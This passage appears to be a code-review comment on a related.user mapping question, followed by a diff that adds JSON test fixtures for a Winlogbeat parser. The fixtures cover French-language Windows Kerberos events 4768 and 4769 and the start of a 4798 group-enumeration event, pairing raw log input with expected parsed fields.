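Review bot: The expected `related.user` in this fixture lists only the subject `doe.j`, while the deleted account `smithee.a` appears solely under `user.target.name`; if `related.user` is meant to be the pivot list for user searches, the target of an account-deletion event is the name analysts will look up, so the asserted output should presumably read `"user": ["doe.j", "smithee.a"]`. The 4725 fixture above, whose hunk starts outside this view, shows the same gap (`related.user` holds `jdoe` but not `ACCOUNT`). This is parser behaviour the fixture merely records, so confirm the intent of `related.user` before changing the assertion.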
@@ -0,0 +1,102 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service 
:\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + 
} + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service 
:\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "event": { + "action": "Service d\u2019authentification Kerberos", + "code": "4768", + "kind": "event", + "module": 
"security", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:10.124000Z", + "action": { + "id": 4768, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "51261", + "PreAuthType": "2", + "ServiceName": "service", + "ServiceSid": "S-1-2-3-4-5", + "Status": "0x0", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "account", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOSTNAME.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + 
"account" + ] + }, + "service": { + "name": "service" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 51261 + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account", + "target": { + "domain": "DOMAIN", + "name": "account" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOSTNAME.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4768", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 3228 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587536", + "task": "Service d\u2019authentification Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json new file mode 100644 index 000000000..ac4cdd94d --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4769.json 
@@ -0,0 +1,101 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service 
:\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le 
r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "event": { + "action": "Op\u00e9rations de ticket du service Kerberos", + "code": "4769", + "kind": "event", + "module": "security", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:02.856000Z", + "action": { + "id": 4769, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "50754", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "ServiceName": "SERVICE$", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "TransmittedServices": "-" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOST01.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "SERVICE$" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 50754 + }, + "user": { + "domain": "DOMAIN.PRIV", + "name": "account", + "target": { + "domain": "DOMAIN.PRIV", + "name": "account@DOMAIN.PRIV" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4769", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 7992 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": 
"Microsoft-Windows-Security-Auditing", + "record_id": "2476587153", + "task": "Op\u00e9rations de ticket du service Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json new file mode 100644 index 000000000..3e7783fbd --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4798.json 
@@ -0,0 +1,114 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program 
